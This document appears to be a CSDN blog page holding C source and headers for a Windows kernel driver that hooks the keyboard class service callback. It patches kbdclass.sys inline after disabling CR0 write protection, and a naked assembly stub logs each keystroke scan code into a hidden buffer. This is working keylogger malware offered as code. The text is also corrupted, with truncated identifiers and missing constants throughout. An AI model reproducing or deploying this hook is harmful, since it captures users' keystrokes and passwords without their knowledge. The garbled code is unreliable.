#ifndef _DBGHELP_H
#define _DBGHELP_H 1
#include &ntddk.h&
#define dprintf if (DBG) DbgPrint
#define nprintf DbgPrint
#define kmalloc(_s)&ExAllocatePoolWithTag(NonPagedPool, _s, 'SYSQ')
//#define kfree(_p)&ExFreePoolWithTag(_p, 'SYSQ')
#define kfree(_p)&ExFreePool(_p)
#include &ntddk.h&
//#include &ntifs.h&
#include &windef.h&
#include &HookKey.h&
#include &struct.h&
#include &ntddkbd.h&
#define MAXBUF 0x15//存储键盘扫描码的缓冲区，其中第一字节为当前存储位置，
ULONG g_OldF
ULONG g_uCr0;
BYTE g_HookCode[5] = { 0xe9, 0, 0, 0, 0 };
BYTE g_OrigCode[5] = { 0 }; // 原函数的前字节内容
BYTE jmp_orig_code[7] = { 0xEA, 0, 0, 0, 0, 0x08, 0x00 }; //因为是长转移，所以有个 0x08
PDEVICE_OBJECT pDevO
BOOL g_bHooked = FALSE;
int KeyCode=0;
PVOID hPageDataS
PVOID KeyB
PDEVICE_OBJECT g_kbDeviceObject = NULL;
ULONG g_kbdclass_
ULONG g_lpKbdServiceC
VOID& ReadKeyBuf();
VOID& ChangeFake_Function();
fake_OldFunction (
&&&&& PDEVICE_OBJECT& DeviceObject,
&&&&& PKEYBOARD_INPUT_DATA& InputDataStart,
&&&&& PKEYBOARD_INPUT_DATA& InputDataEnd,
&&&&& PULONG& InputDataConsumed
#ifdef ALLOC_PRAGMA
#pragma alloc_text(NONPAGED, fake_OldFunction)
& HookKey.H
& Author: &your name&
& Last Updated:
& This framework is generated by EasySYS 0.3.0
& This template file is copying from QuickSYS 0.3.0 written by Chunhua Liu
#ifndef _HOOKKEY_H
#define _HOOKKEY_H 1
// Define the various device type values.& Note that values used by Microsoft
// Corporation are in the range 0-0x7FFF(32767), and 0x)-0xFFFF(65535)
// are reserved for use by customers.
#define FILE_DEVICE_HOOKKEY&0x8000
// Macro definition for defining IOCTL and FSCTL function control codes. Note
// that function codes 0-0x7FF(2047) are reserved for Microsoft Corporation,
// and 0x800(2048)-0xFFF(4095) are reserved for customers.
#define HOOKKEY_IOCTL_BASE&0x800
// The device driver IOCTLs
#define CTL_CODE_HOOKKEY(i) CTL_CODE(FILE_DEVICE_HOOKKEY, HOOKKEY_IOCTL_BASE+i, METHOD_BUFFERED, FILE_ANY_ACCESS)
#define IOCTL_HOOKKEY_HELLO&CTL_CODE_HOOKKEY(0)
#define IOCTL_HOOKKEY_TEST&CTL_CODE_HOOKKEY(1)
// Name that Win32 front end will use to open the HookKey device
#define HOOKKEY_WIN32_DEVICE_NAME_A&&////.//HookKey
#define HOOKKEY_WIN32_DEVICE_NAME_W&L&////.//HookKey
#define HOOKKEY_DEVICE_NAME_A&&&&
#define HOOKKEY_DEVICE_NAME_W&&&L&
#define HOOKKEY_DOS_DEVICE_NAME_A&&&
#define HOOKKEY_DOS_DEVICE_NAME_W&&L&
#ifdef _UNICODE
#define HOOKKEY_WIN32_DEVICE_NAME HOOKKEY_WIN32_DEVICE_NAME_W
#define HOOKKEY_DEVICE_NAME&&HOOKKEY_DEVICE_NAME_W
#define HOOKKEY_DOS_DEVICE_NAME&HOOKKEY_DOS_DEVICE_NAME_W
#define HOOKKEY_WIN32_DEVICE_NAME HOOKKEY_WIN32_DEVICE_NAME_A
#define HOOKKEY_DEVICE_NAME&&HOOKKEY_DEVICE_NAME_A
#define HOOKKEY_DOS_DEVICE_NAME&HOOKKEY_DOS_DEVICE_NAME_A
Proxy_OldFunction (
PDEVICE_OBJECT& DeviceObject,
PKEYBOARD_INPUT_DATA& InputDataStart,
PKEYBOARD_INPUT_DATA& InputDataEnd,
PULONG& InputDataConsumed
typedef VOID
(*My_KeyboardClassServiceCallback) (
&&&&&&&&&PDEVICE_OBJECT& DeviceObject,
&&&&&&&&&PKEYBOARD_INPUT_DATA& InputDataStart,
&&&&&&&&&PKEYBOARD_INPUT_DATA& InputDataEnd,
&&&&&&&&&PULONG& InputDataConsumed
&&&&&&&&&);
My_KeyboardClassServiceCallback orig_KeyboardClassServiceCallback = NULL;
void WPOFF()
&&& ULONG uA
&&&&&&& mov eax, cr0;
&&&&&&& mov uAttr,
&&&&&&& and eax, 0FFFEFFFFh; // CR0 16 BIT = 0
&&&&&&& mov cr0,
&&&&&&& cli
&&& g_uCr0 = uA //保存原有的 CRO 屬性
VOID WPON()
&&&&&&& sti
&&&&&&& mov eax, g_uCr0; //恢復原有 CR0 屬性
&&&&&&& mov cr0,
// 停止inline hook
VOID UnHookOldFunction ()
&&& KIRQL& oldI
&&& WPOFF();
&&& oldIrql = KeRaiseIrqlToDpcLevel();
&&& RtlCopyMemory ( (BYTE*)g_OldFunction, g_OrigCode, 5 );
&&& KeLowerIrql(oldIrql);
&&& WPON();
&&& g_bHooked = FALSE;
// 开始inline hook --& OldFunction
VOID HookOldFunction ()
&&& KIRQL& oldI
&&& if (g_OldFunction == 0) {
&&&&&&& DbgPrint(&OldFunction == NULL/n&);
&&& //DbgPrint(&开始inline hook --& OldFunction/n&);
&&& DbgPrint( &OldFunction的地址t0x%08x/n&, (ULONG)g_OldFunction );
&&& // 保存原函数的前字节内容
&&& RtlCopyMemory (g_OrigCode, (BYTE*)g_OldFunction, 5);//★
&&& *( (ULONG*)(g_HookCode + 1) ) = (ULONG)fake_OldFunction - (ULONG)g_OldFunction - 5;//★
&&& // 禁止系统写保护，提升IRQL到DPC
&&& WPOFF();
&&& oldIrql = KeRaiseIrqlToDpcLevel();
&&& RtlCopyMemory ( (BYTE*)g_OldFunction, g_HookCode, 5 );
&&& *( (ULONG*)(jmp_orig_code + 1) ) = (ULONG) ( (BYTE*)g_OldFunction + 5 );//★
&&& RtlCopyMemory ( (BYTE*)Proxy_OldFunction, g_OrigCode, 5);//修改Proxy_OldFunction函数头
&&& RtlCopyMemory ( (BYTE*)Proxy_OldFunction + 5, jmp_orig_code, 7);
&&& // 恢复写保护，降低IRQL
&&& KeLowerIrql(oldIrql);
&&& WPON();
&&& g_bHooked = TRUE;
VOID& ChangeFake_Function()
&KIRQL& oldI
&ULONG addr=(ULONG)fake_OldF
&ULONG code_fill=0xAAAAAAAA;
&DbgPrint(&fake_OldFunction:%x&,addr);
&&& oldIrql = KeRaiseIrqlToDpcLevel();
&&& for (i=0;i&0x200;i++)
&&if (*((ULONG*)(addr+i))==code_fill)
&&&DbgPrint(&AAAAAAAA Finded:%x&,KeyBuf);
&&&*((ULONG*)(addr+i))=(ULONG)KeyB
&DbgPrint(&AAAAAAAA:%x&,*((ULONG*)(addr+i))& );
&&& KeLowerIrql(oldIrql);
&&& WPON();
VOID& ReadKeyBuf()
&BYTE Index=*(BYTE*)KeyB
&BYTE i,j;
//&BYTE _Buf[MAXBUF];
&for (i=0;i&MAXBUF;i++)
&&DbgPrint(&Key Code:%x&,*(BYTE*)((BYTE*)KeyBuf+i));
// 跳转到我们的函数里面进行预处理
__declspec (naked)
fake_OldFunction (
PDEVICE_OBJECT& DeviceObject,
PKEYBOARD_INPUT_DATA& InputDataStart,
PKEYBOARD_INPUT_DATA& InputDataEnd,
PULONG& InputDataConsumed
&&&push&&& eax
&&&&&&& push&&& ebx
&&&&&&& push&&& ecx
&&push&&& esi
&&xor&&&& esi,esi
&&mov&&&& eax, [0xAAAAAAAA];
&&mov&&&& ebx, [esp+0x18]
&& //movzx&& ecx, word ptr [ebx-20]//+2
&&mov&&&& cl , byte ptr [ebx+2];//按键码
&&&&&&& mov&&&& ch , byte ptr [eax];//得到当前位置-&ch
&&&&&&& cmp&&&& ch , MAXBUF
&&jnz&&&& NotLastPlace
&&mov&&&& ch,& 0x0;
NotLastPlace:
&&inc&&&& ch
&&movzx&& si,ch
&&mov&&&& byte ptr [eax],&&& ch
&&&&&&& mov&&&& byte ptr [eax+esi],cl
&&&&&&& pop esi
&&&pop ecx
&&&pop ebx
&&&pop eax
&&jmp Proxy_OldFunction&& ;//★在这一系列JMP中，没有一处使用CALL，简化了代码，增强了稳定性
// 代理函数，负责跳转到原函数中继续执行
__declspec (naked)
Proxy_OldFunction (
&&& PDEVICE_OBJECT& DeviceObject,
&&& PKEYBOARD_INPUT_DATA& InputDataStart,
&&& PKEYBOARD_INPUT_DATA& InputDataEnd,
&&& PULONG& InputDataConsumed
&&& __asm {& // 共字节
&&&&&&&&&&& _emit 0x90
&&&&&&&&&&& _emit 0x90
&&&&&&&&&&& _emit 0x90
&&&&&&&&&&& _emit 0x90
&&&&&&&&&&& _emit 0x90& // 前字节实现原函数的头字节功能
&&&&&&&&&&& _emit 0x90& // 这个填充jmp
&&&&&&&&&&& _emit 0x90
&&&&&&&&&&& _emit 0x90
&&&&&&&&&&& _emit 0x90
&&&&&&&&&&& _emit 0x90& // 这字节保存原函数+5处的地址
&&&&&&&&&&& _emit 0x90&
&&&&&&&&&&& _emit 0x90& // 因为是长转移,所以必须是0x0080
//////////////////////////////////////////////////////////////////////////
GetModlueBaseAdress(
&&&&&char* ModlueName,
&&&&&BOOL bKernelBase
&ULONG size,
&PSYSTEM_MODULE_INFORMATION
&PVOID driverAddress=0;
&ZwQuerySystemInformation(SystemModuleInformation,&size, 0, &size);
&if(NULL==(buf = (PULONG)ExAllocatePool(PagedPool, size))){
&&DbgPrint(&failed alloc memory failed /n&);
&&return 0;
&status=ZwQuerySystemInformation(SystemModuleInformation,buf, size , 0);
&if(!NT_SUCCESS( status )) {
&&DbgPrint(&failed query/n&);
&&return 0;
&module = (PSYSTEM_MODULE_INFORMATION)(( PULONG )buf + 1);
&// 系统模块基址
&if ( TRUE == bKernelBase )
&&driverAddress = module[0].B
&&DbgPrint(&KernelBase:%x/n&,driverAddress);
&&goto _x_;
&// 其他模块基址
&for (index = 0; index & * index++) {
&&if (_stricmp(module[index].ImageName + module[index].ModuleNameOffset, ModlueName) == 0)
&&&driverAddress = module[index].B
&&&DbgPrint(&Module found at:%x/n&,driverAddress);
&&&goto _x_;
&ExFreePool(buf);
&return driverA
ULONG GetFunctionAddr( IN PCWSTR FunctionName)
&&& UNICODE_STRING UniCodeFunctionN
&&& RtlInitUnicodeString( &UniCodeFunctionName, FunctionName );
&&& return (ULONG)MmGetSystemRoutineAddress( &UniCodeFunctionName );&&
//根据特征值，搜索OldFunction
ULONG FindOldFunctionAddress()
&NTSTATUS status = STATUS_SUCCESS;
&UNICODE_STRING ustrLinkN
&UNICODE_STRING ustrDevN&&&
&PDEVICE_OBJECT pDevO
&ULONG i, curA
&PUCHAR FileC
&DWORD dwRet,dwS
&&& LARGE_INTEGER
&ULONG g_kbdclass_
&ULONG g_lpKbdServiceC
&PDEVICE_OBJECT g_kbDeviceObject = NULL;
&&& KEYBOARD_INPUT_DATA
&ULONG Addr_OldFunction = 0;
&ULONG code1_sp2=0x8b55ff8b, code2_sp2=0x8b5151ec, code3_sp2=0x,code4_sp2=0x8b530008;
&&& //KbdInit();
&g_kbdclass_base = (ULONG)GetModlueBaseAdress( &kbdclass.sys&,0 );
&DbgPrint(&kbdclass.sys: 0x%08lx/n&, (PVOID)g_kbdclass_base);
&if ( 0 == g_kbdclass_base ) {
&&DbgPrint(&ERROR: g_kbdclass_base == 0/n&);
&&return STATUS_SUCCESS;
&curAddr = g_kbdclass_
&//&DbgPrint(&curAddr: 0x%08lx/n&, curAddr);
&for (i=curAi&=curAddr+0x2000;i++)
&&//&DbgPrint(&i: 0x%08lx/n&, i);
&&if (*((ULONG *)i)==code1_sp2) {
&&&if (*((ULONG *)(i+4))==code2_sp2) {
&&&&if (*((ULONG *)(i+8))==code3_sp2) {
&&&&&if (*((ULONG *)(i+12))==code4_sp2) {
&&&&&&g_lpKbdServiceCallback=i;
&Addr_OldFunction = (ULONG)g_lpKbdServiceC
&DbgPrint(&KeyboardClassServiceCallback: 0x%08lx/n&, (PVOID)g_lpKbdServiceCallback);
&//DbgPrint(&g_kbDeviceObject: 0x%08lx/n&, (PVOID)g_kbDeviceObject);
&return Addr_OldF
VOID OnUnload( IN PDRIVER_OBJECT DriverObject )
& UNICODE_STRING strL
& RtlInitUnicodeString(&strLink, L&
& DbgPrint(&My Driver Unloaded!&);
& DbgPrint(&MyKeyboardClassServiceCallback invoked: %x&,KeyCode);
& ReadKeyBuf();
& ExFreePool(KeyBuf);
& IoDeleteSymbolicLink(&strLink);
& IoDeleteDevice(DriverObject-&DeviceObject);
& UnHookOldFunction();
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
& NTSTATUS status = STATUS_SUCCESS;
& UNICODE_STRING ustrLinkN
& UNICODE_STRING ustrDevN&&&
& DWORD dwSize,dwR
& PVOID pT
& KEYBOARD_INPUT_DATA
& DbgPrint(&My Driver Loaded!&);
& theDriverObject-&DriverUnload = OnU
& RtlInitUnicodeString(&ustrDevName, L&
& status = IoCreateDevice(theDriverObject,
&& &ustrDevName,
&& FILE_DEVICE_UNKNOWN,
&& &pDevObj);
& if(!NT_SUCCESS(status))&{
&& DbgPrint(&IoCreateDevice = 0x%x/n&, status);
& RtlInitUnicodeString(&ustrLinkName, L&
& status = IoCreateSymbolicLink(&ustrLinkName, &ustrDevName);&
& if(!NT_SUCCESS(status)) {
&& DbgPrint(&IoCreateSymbolicLink = 0x%x/n&, status);
&& IoDeleteDevice(pDevObj);&
& KeyBuf=(PVOID)ExAllocatePool( NonPagedPool,MAXBUF+2);
& *((BYTE*)KeyBuf)=0x0;
& ChangeFake_Function();
& g_OldFunction = FindOldFunctionAddress();
& HookOldFunction();
& return STATUS_SUCCESS;
/***************************************************************************************
* AUTHOR : sudami []
* TIME&& :
[13:8:2008 - 13:07]
* MODULE : struct.h
* Command:
*&& 驱动的头文件
* Description:
*&& 定义一些常量,避免重复劳动; 您可以在此添加需要的函数/结构体&&&&&&&&&&&&&&&&&&&&
* Copyright (c) 2008 - 2010 sudami.
* Freely distributable in source or binary for noncommercial purposes.
* TAKE IT EASY,JUST FOR FUN.
****************************************************************************************/
#pragma once
#include &ntddk.h&
typedef long LONG;
//typedef unsigned char& BOOL, *PBOOL;
typedef unsigned char& BYTE, *PBYTE;
typedef unsigned long& DWORD, *PDWORD;
typedef unsigned short WORD, *PWORD;
//typedef void& *HMODULE;
typedef long NTSTATUS, *PNTSTATUS;
typedef unsigned long DWORD;
typedef DWORD * PDWORD;
typedef unsigned long ULONG;
typedef unsigned long ULONG_PTR;
typedef ULONG *PULONG;
typedef unsigned short WORD;
typedef unsigned char BYTE;
typedef unsigned char UCHAR;
typedef unsigned short USHORT;
typedef void *PVOID;
typedef BYTE BOOLEAN;
#define SEC_IMAGE&&& 0x
//----------------------------------------------------
typedef enum _SYSTEM_INFORMATION_CLASS {
&SystemBasicInformation = 0,
&SystemCpuInformation = 1,
&SystemPerformanceInformation = 2,
&SystemTimeOfDayInformation = 3, /* was SystemTimeInformation */
&Unknown4,
&SystemProcessInformation = 5,
&Unknown6,
&Unknown7,
&SystemProcessorPerformanceInformation = 8,
&Unknown9,
&Unknown10,
&SystemModuleInformation = 11,
&Unknown12,
&Unknown13,
&Unknown14,
&Unknown15,
&SystemHandleInformation = 16,
&Unknown17,
&SystemPageFileInformation = 18,
&Unknown19,
&Unknown20,
&SystemCacheInformation = 21,
&Unknown22,
&SystemInterruptInformation = 23,
&SystemDpcBehaviourInformation = 24,
&SystemFullMemoryInformation = 25,
&SystemNotImplemented6 = 25,
&SystemLoadImage = 26,
&SystemUnloadImage = 27,
&SystemTimeAdjustmentInformation = 28,
&SystemTimeAdjustment = 28,
&SystemSummaryMemoryInformation = 29,
&SystemNotImplemented7 = 29,
&SystemNextEventIdInformation = 30,
&SystemNotImplemented8 = 30,
&SystemEventIdsInformation = 31,
&SystemCrashDumpInformation = 32,
&SystemExceptionInformation = 33,
&SystemCrashDumpStateInformation = 34,
&SystemKernelDebuggerInformation = 35,
&SystemContextSwitchInformation = 36,
&SystemRegistryQuotaInformation = 37,
&SystemCurrentTimeZoneInformation = 44,
&SystemTimeZoneInformation = 44,
&SystemLookasideInformation = 45,
&SystemSetTimeSlipEvent = 46,
&SystemCreateSession = 47,
&SystemDeleteSession = 48,
&SystemInvalidInfoClass4 = 49,
&SystemRangeStartInformation = 50,
&SystemVerifierInformation = 51,
&SystemAddVerifier = 52,
&SystemSessionProcessesInformation&= 53,
&SystemInformationClassMax
} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;
typedef struct _SYSTEM_MODULE_INFORMATION {//Information Class 11
&ULONG&&& Reserved[2];
&PVOID&&& B
&ULONG&&& S
&ULONG&&& F
&USHORT&&& I
&USHORT&&& U
&USHORT&&& LoadC
&USHORT&&& ModuleNameO
&CHAR&&& ImageName[256];
}SYSTEM_MODULE_INFORMATION,*PSYSTEM_MODULE_INFORMATION;
typedef struct {
&DWORD&&& dwNumberOfM
&SYSTEM_MODULE_INFORMATION&&&
} MODULES, *PMODULES;
#pragma pack(4)
typedef struct _PEB_LDR_DATA
&BOOLEAN I
&PVOID SsH
&LIST_ENTRY InLoadOrderModuleL
&LIST_ENTRY InMemoryOrderModuleL
&LIST_ENTRY InInitializationOrderModuleL
} PEB_LDR_DATA, *PPEB_LDR_DATA;
#pragma pack()
typedef struct _PEB_ORIG {
&&& BYTE Reserved1[2];
&&& BYTE BeingD
&&& BYTE Reserved2[229];
&&& PVOID Reserved3[59];
&&& ULONG SessionId;
} PEB_ORIG, *PPEB_ORIG;
typedef void (*PPEBLOCKROUTINE)(PVOID PebLock);
struct _PEB_FREE_BLOCK {
&struct _PEB_FREE_BLOCK *N
typedef struct _PEB_FREE_BLOCK PEB_FREE_BLOCK;
typedef struct _PEB_FREE_BLOCK *PPEB_FREE_BLOCK;
typedef struct _RTL_DRIVE_LETTER_CURDIR {
&ULONG TimeS
&UNICODE_STRING DosP
} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;
typedef struct _RTL_USER_PROCESS_PARAMETERS {
&ULONG MaximumL
&ULONG DebugF
&PVOID ConsoleH
&ULONG ConsoleF
&HANDLE StdInputH
&HANDLE StdOutputH
&HANDLE StdErrorH
&UNICODE_STRING CurrentDirectoryP
&HANDLE CurrentDirectoryH
&UNICODE_STRING DllP
&UNICODE_STRING ImagePathN
&UNICODE_STRING CommandL
&ULONG StartingPositionL
&ULONG StartingPositionT
&ULONG CharW
&ULONG CharH
&ULONG ConsoleTextA
&ULONG WindowF
&ULONG ShowWindowF
&UNICODE_STRING WindowT
&UNICODE_STRING DesktopN
&UNICODE_STRING ShellI
&UNICODE_STRING RuntimeD
&RTL_DRIVE_LETTER_CURDIR DLCurrentDirectory[0x20];
} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;
typedef struct _PEB {
&BOOLEAN InheritedAddressS
&BOOLEAN ReadImageFileExecO
&BOOLEAN BeingD
&BOOLEAN S
&PVOID ImageBaseA
&PPEB_LDR_DATA LoaderD
&PRTL_USER_PROCESS_PARAMETERS ProcessP
&PVOID SubSystemD
&PVOID ProcessH
&PVOID FastPebL
&PPEBLOCKROUTINE FastPebLockR
&PPEBLOCKROUTINE FastPebUnlockR
&ULONG EnvironmentUpdateC
&PVOID *KernelCallbackT
&PVOID EventLogS
&PVOID EventL
&PPEB_FREE_BLOCK FreeL
&ULONG TlsExpansionC
&PVOID TlsB
&ULONG TlsBitmapBits[0x2];
&PVOID ReadOnlySharedMemoryB
&PVOID ReadOnlySharedMemoryH
&PVOID *ReadOnlyStaticServerD
&PVOID AnsiCodePageD
&PVOID OemCodePageD
&PVOID UnicodeCaseTableD
&ULONG NumberOfP
&ULONG NtGlobalF
&BYTE Spare2[0x4];
&LARGE_INTEGER CriticalSectionT
&ULONG HeapSegmentR
&ULONG HeapSegmentC
&ULONG HeapDeCommitTotalFreeT
&ULONG HeapDeCommitFreeBlockT
&ULONG NumberOfH
&ULONG MaximumNumberOfH
&PVOID **ProcessH
&PVOID GdiSharedHandleT
&PVOID ProcessStarterH
&PVOID GdiDCAttributeL
&PVOID LoaderL
&ULONG OSMajorV
&ULONG OSMinorV
&ULONG OSBuildN
&ULONG OSPlatformId;
&ULONG ImageSubS
&ULONG ImageSubSystemMajorV
&ULONG ImageSubSystemMinorV
&ULONG GdiHandleBuffer[0x22];
&ULONG PostProcessInitR
&ULONG TlsExpansionB
&BYTE TlsExpansionBitmapBits[0x80];
&ULONG SessionId;
} PEB, *PPEB;
typedef struct _SYSTEM_PROCESS_INFORMATION {
&&& ULONG NextEntryO
&&& ULONG NumberOfT
&&& LARGE_INTEGER SpareLi1;
&&& LARGE_INTEGER SpareLi2;
&&& LARGE_INTEGER SpareLi3;
&&& LARGE_INTEGER CreateT
&&& LARGE_INTEGER UserT
&&& LARGE_INTEGER KernelT
&&& UNICODE_STRING ImageN
&&& KPRIORITY BaseP
&&& HANDLE UniqueProcessId;
&&& HANDLE InheritedFromUniqueProcessId;
&&& ULONG HandleC
&&& ULONG SpareUl2;
&&& ULONG SpareUl3;
&&& ULONG PeakVirtualS
&&& ULONG VirtualS
&&& ULONG PageFaultC
&&& ULONG PeakWorkingSetS
&&& ULONG WorkingSetS
&&& ULONG QuotaPeakPagedPoolU
&&& ULONG QuotaPagedPoolU
&&& ULONG QuotaPeakNonPagedPoolU
&&& ULONG QuotaNonPagedPoolU
&&& ULONG PagefileU
&&& ULONG PeakPagefileU
&&& ULONG PrivatePageC
} SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESS_INFORMATION;
typedef struct _SYSTEM_THREAD_INFORMATION {
&&& LARGE_INTEGER KernelT
&&& LARGE_INTEGER UserT
&&& LARGE_INTEGER CreateT
&&& ULONG WaitT
&&& PVOID StartA
&&& CLIENT_ID ClientId;
&&& KPRIORITY P
&&& LONG BaseP
&&& ULONG ContextS
&&& ULONG ThreadS
&&& ULONG WaitR
} SYSTEM_THREAD_INFORMATION, *PSYSTEM_THREAD_INFORMATION;
struct _SYSTEM_THREADS
&LARGE_INTEGER&&KernelT
&LARGE_INTEGER&&UserT
&LARGE_INTEGER&&CreateT
&ULONG&&&&WaitT
&PVOID&&&&StartA
&CLIENT_ID&&&ClientIs;
&KPRIORITY&&&P
&KPRIORITY&&&BaseP
&ULONG&&&&ContextSwitchC
&ULONG&&&&ThreadS
&KWAIT_REASON&&WaitR
struct _SYSTEM_PROCESSES
&ULONG&&&&NextEntryD
&ULONG&&&&ThreadC
&ULONG&&&&Reserved[6];
&LARGE_INTEGER&&CreateT
&LARGE_INTEGER&&UserT
&LARGE_INTEGER&&KernelT
&UNICODE_STRING&&ProcessN
&KPRIORITY&&&BaseP
&ULONG&&&&ProcessId;
&ULONG&&&&InheritedFromProcessId;
&ULONG&&&&HandleC
&ULONG&&&&Reserved2[2];
&VM_COUNTERS&&&VmC
&IO_COUNTERS&&&IoC //windows 2000 only
&struct _SYSTEM_THREADS&Threads[1];
typedef struct _HANDLE_TABLE_ENTRY_INFO
&&& ULONG AuditM
} HANDLE_TABLE_ENTRY_INFO, *PHANDLE_TABLE_ENTRY_INFO;
typedef struct _HANDLE_TABLE_ENTRY
&&&&&&& PVOID O
&&&&&&& ULONG_PTR ObA
&&&&&&& PHANDLE_TABLE_ENTRY_INFO InfoT
&&&&&&& ULONG_PTR V
&&&&&&& ULONG GrantedA
&&&&&&& struct
&&&&&&&&&&& USHORT GrantedAccessI
&&&&&&&&&&& USHORT CreatorBackTraceI
&&&&&&& };
&&&&&&& LONG NextFreeTableE
} HANDLE_TABLE_ENTRY, *PHANDLE_TABLE_ENTRY;
typedef struct _HANDLE_TABLE
&&& ULONG TableC
&&& PEPROCESS QuotaP
&&& PVOID UniqueProcessId;
&&& ULONG HandleTableLock[4];
&&& LIST_ENTRY HandleTableL
&&& ULONG HandleContentionE
&&& PVOID DebugI
&&& LONG ExtraInfoP
&&& ULONG FirstF
&&& ULONG LastF
&&& ULONG NextHandleNeedingP
&&& LONG HandleC
&&&&&&& ULONG F
&&&&&&& UCHAR StrictFIFO:1;
} HANDLE_TABLE, *PHANDLE_TABLE;
typedef struct _OBJECT_TYPE_INITIALIZER {
&BOOLEAN UseDefaultO
&BOOLEAN CaseI
&ULONG InvalidA
&GENERIC_MAPPING GenericM
&ULONG ValidAccessM
&BOOLEAN SecurityR
&BOOLEAN MaintainHandleC
&BOOLEAN MaintainTypeL
&POOL_TYPE PoolT
&ULONG DefaultPagedPoolC
&ULONG DefaultNonPagedPoolC
&PVOID DumpP
&PVOID OpenP
&PVOID CloseP
&PVOID DeleteP
&PVOID ParseP
&PVOID SecurityP
&PVOID QueryNameP
&PVOID OkayToCloseP
} OBJECT_TYPE_INITIALIZER, *POBJECT_TYPE_INITIALIZER;
typedef struct _OBJECT_TYPE {
&ERESOURCE M
&LIST_ENTRY TypeL
&UNICODE_STRING N&&&&&&&&&&& // Copy from object header for convenience
&PVOID DefaultO
&ULONG TotalNumberOfO
&ULONG TotalNumberOfH
&ULONG HighWaterNumberOfO
&ULONG HighWaterNumberOfH
&OBJECT_TYPE_INITIALIZER TypeI
&ERESOURCE ObjectLocks[4];
} OBJECT_TYPE, *POBJECT_TYPE;
typedef struct _OBJECT_DIRECTORY {
&&& struct _OBJECT_DIRECTORY_ENTRY *HashBuckets[ 37 ];
&&& ULONG L
&&& PVOID DeviceM
&&& ULONG SessionId;
&USHORT SymbolicLinkUsageC
} OBJECT_DIRECTORY, *POBJECT_DIRECTORY;
typedef enum _KAPC_ENVIRONMENT {
& OriginalApcEnvironment,
& AttachedApcEnvironment,
& CurrentApcEnvironment,
& InsertApcEnvironment
} KAPC_ENVIRONMENT;
typedef enum
&&& OriginalApcEnvironment,
&AttachedApcEnvironment,
&CurrentApcEnvironment
} KAPC_ENVIRONMENT;
//int swprintf( wchar_t *, const wchar_t *, ... );
int wsprintf( PWSTR buffer, PCWSTR spec, ... );
//----------------------------------------------------
NTAPI ZwQuerySystemInformation(
&&&&&&&&& IN ULONG SystemInformationClass,
&&&&&&&&& IN PVOID SystemInformation,
&&&&&&&&& IN ULONG SystemInformationLength,
&&&&&&&&& OUT PULONG ReturnLength);
& NtOpenFile(
&&& OUT PHANDLE& FileHandle,
&&& IN ACCESS_MASK& DesiredAccess,
&&& IN POBJECT_ATTRIBUTES& ObjectAttributes,
&&& OUT PIO_STATUS_BLOCK& IoStatusBlock,
&&& IN ULONG& ShareAccess,
&&& IN ULONG& OpenOptions
ZwOpenProcess(
&& OUT PHANDLE ProcessHandle,
&& IN ACCESS_MASK DesiredAccess,
&& IN POBJECT_ATTRIBUTES ObjectAttributes,
&& IN PCLIENT_ID ClientId
PsLookupProcessByProcessId(
&&& IN HANDLE ProcessId,
&&& OUT PEPROCESS *Process
& PsGetProcessId(
&&& IN PEPROCESS& Process
RtlFormatCurrentUserKeyPath(
&&& OUT PUNICODE_STRING CurrentUserKeyPath
VOID KeAttachProcess( PEPROCESS proc );
VOID KeDetachProcess();
ObReferenceObjectByName(
&&&&&&IN PUNICODE_STRING ObjectName,
&&&&&&IN ULONG Attributes,
&&&&&&IN PACCESS_STATE PassedAccessState OPTIONAL,
&&&&&&IN ACCESS_MASK DesiredAccess OPTIONAL,
&&&&&&IN POBJECT_TYPE ObjectType,
&&&&&&IN KPROCESSOR_MODE AccessMode,
&&&&&&IN OUT PVOID ParseContext OPTIONAL,
&&&&&&OUT PVOID *Object
//////////////////////////////////////////////////////////////////////////
// 写保护的开&关
void WPOFF();
void WPON();
* 以上用户言论只代表其个人观点，不代表CSDN网站的观点或立场
访问：364188次
积分：5694
积分：5694
排名：第1594名
原创：195篇
转载：87篇
评论：58条
(1)(1)(2)(1)(1)(1)(9)(9)(2)(1)(2)(6)(3)(2)(9)(2)(3)(8)(4)(2)(4)(14)(37)(24)(44)(36)(6)(9)(6)(33)(1)